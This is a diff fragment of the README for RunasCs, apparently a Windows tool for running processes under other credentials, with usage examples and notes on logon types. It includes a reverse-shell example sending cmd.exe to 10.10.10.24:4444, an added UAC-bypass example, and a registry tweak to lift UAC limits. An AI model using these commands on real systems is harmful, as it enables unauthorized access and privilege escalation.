antonioCoco/RunasCs/README.md

         RunasCs.exe user1 password1 cmd.exe -r 10.10.10.24:4444
-    Run a command simulating the /netonly flag of runas.exe RunasCs.exe user1 password1 whoami -d domain -l 9
+    Run a command simulating the /netonly flag of runas.exe RunasCs.exe user1 password1 whoami -d domain -l 9 Run a command as an Administrator bypassing UAC RunasCs.exe adm1 password1 "whoami /all" --bypass-uac
 ```

 The two processes (calling and called) will communicate through one *pipe* (both for *stdout* and *stderr*).
 The default logon type is 8 (*NetworkCleartext*).

-*NetworkCleartext* logon type is the one with widest permissions as it doesn't get filtered by UAC for local tokens and still allows authentications over the Network.
+**NetworkCleartext** logon type is the one with widest permissions as it doesn't get filtered by UAC in local tokens and still allows
+ authentications over the Network as it stores credentials in the authentication package.

 If you set *Interactive* (2) logon type you will face some *UAC* restriction problems.
 You can make interactive logon without any restrictions by setting the following regkey to 0 and restart the server: